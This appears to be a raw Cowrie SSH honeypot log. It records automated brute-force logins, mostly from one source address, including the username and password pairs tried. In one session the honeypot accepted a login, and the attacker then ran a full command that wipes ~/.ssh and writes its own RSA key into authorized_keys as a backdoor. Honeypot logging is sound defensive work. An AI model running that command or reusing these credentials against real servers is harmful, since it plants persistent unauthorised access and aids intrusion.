{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:30.135070Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@111","message":"login attempt [root/Admin@111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:38:31.111842Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:38:31.643774Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:38:31.644542Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:38:31.645879Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:31.882261Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:38:32.364298Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:38:32.365085Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:38:32.600405Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:32.601312Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45323,"dst_ip":"1.2.3.4","dst_port":22,"session":"b039468157d5","protocol":"ssh","message":"New connection: 212.227.235.229:45323 (1.2.3.4:22) [session: b039468157d5]","sensor":"my-vps","timestamp":"2025-09-09T01:38:32.840287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:32.841207Z","src_ip":"212.227.235.229","session":"b039468157d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:33.076877Z","src_ip":"212.227.235.229","session":"b039468157d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43140,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5e5b0a7c33e","protocol":"ssh","message":"New connection: 212.227.235.229:43140 (1.2.3.4:22) [session: d5e5b0a7c33e]","sensor":"my-vps","timestamp":"2025-09-09T01:38:33.530820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:33.531361Z","src_ip":"212.227.235.229","session":"d5e5b0a7c33e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:33.800313Z","src_ip":"212.227.235.229","session":"d5e5b0a7c33e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:34.060995Z","src_ip":"212.227.235.229","session":"b039468157d5"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:34.980451Z","src_ip":"212.227.235.229","session":"d5e5b0a7c33e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:35.298558Z","src_ip":"212.227.235.229","session":"b039468157d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45771,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dbd0c52fd9b","protocol":"ssh","message":"New connection: 212.227.235.229:45771 (1.2.3.4:22) [session: 4dbd0c52fd9b]","sensor":"my-vps","timestamp":"2025-09-09T01:38:35.529761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:35.530726Z","src_ip":"212.227.235.229","session":"4dbd0c52fd9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:35.763707Z","src_ip":"212.227.235.229","session":"4dbd0c52fd9b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:36.241702Z","src_ip":"212.227.235.229","session":"d5e5b0a7c33e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:38:36.733471Z","src_ip":"212.227.235.229","session":"4dbd0c52fd9b"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:36.966976Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:36.967835Z","src_ip":"212.227.235.229","session":"4dbd0c52fd9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46694,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1c4a6425c07","protocol":"ssh","message":"New connection: 212.227.235.229:46694 (1.2.3.4:22) [session: c1c4a6425c07]","sensor":"my-vps","timestamp":"2025-09-09T01:38:38.708329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:38.709239Z","src_ip":"212.227.235.229","session":"c1c4a6425c07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:39.019857Z","src_ip":"212.227.235.229","session":"c1c4a6425c07"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:40.305641Z","src_ip":"212.227.235.229","session":"c1c4a6425c07"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:41.618804Z","src_ip":"212.227.235.229","session":"c1c4a6425c07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60198,"dst_ip":"1.2.3.4","dst_port":22,"session":"6933879de151","protocol":"ssh","message":"New connection: 212.227.235.229:60198 (1.2.3.4:22) [session: 6933879de151]","sensor":"my-vps","timestamp":"2025-09-09T01:38:45.451820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:45.452574Z","src_ip":"212.227.235.229","session":"6933879de151"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:45.572375Z","src_ip":"212.227.235.229","session":"6933879de151"}
{"eventid":"cowrie.login.failed","username":"checker","password":"checker","message":"login attempt [checker/checker] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:46.092969Z","src_ip":"212.227.235.229","session":"6933879de151"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:47.214773Z","src_ip":"212.227.235.229","session":"6933879de151"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36084,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b95c3d0debb","protocol":"ssh","message":"New connection: 212.227.235.229:36084 (1.2.3.4:22) [session: 7b95c3d0debb]","sensor":"my-vps","timestamp":"2025-09-09T01:38:55.929956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:55.930871Z","src_ip":"212.227.235.229","session":"7b95c3d0debb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:56.188673Z","src_ip":"212.227.235.229","session":"7b95c3d0debb"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:57.262492Z","src_ip":"212.227.235.229","session":"7b95c3d0debb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:58.522583Z","src_ip":"212.227.235.229","session":"7b95c3d0debb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42412,"dst_ip":"1.2.3.4","dst_port":22,"session":"33613d082a89","protocol":"ssh","message":"New connection: 212.227.235.229:42412 (1.2.3.4:22) [session: 33613d082a89]","sensor":"my-vps","timestamp":"2025-09-09T01:39:00.453720Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:00.556575Z","src_ip":"212.227.235.229","session":"33613d082a89"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.167","src_port":37216,"dst_ip":"1.2.3.4","dst_port":22,"session":"b22a3e252dfe","protocol":"ssh","message":"New connection: 203.195.82.167:37216 (1.2.3.4:22) [session: b22a3e252dfe]","sensor":"my-vps","timestamp":"2025-09-09T01:39:21.465301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:39:21.466218Z","src_ip":"203.195.82.167","session":"b22a3e252dfe"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T01:39:21.688200Z","src_ip":"203.195.82.167","session":"b22a3e252dfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48104,"dst_ip":"1.2.3.4","dst_port":22,"session":"49490c5c4895","protocol":"ssh","message":"New connection: 212.227.235.229:48104 (1.2.3.4:22) [session: 49490c5c4895]","sensor":"my-vps","timestamp":"2025-09-09T01:39:29.718776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:29.719527Z","src_ip":"212.227.235.229","session":"49490c5c4895"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:29.943594Z","src_ip":"212.227.235.229","session":"49490c5c4895"}
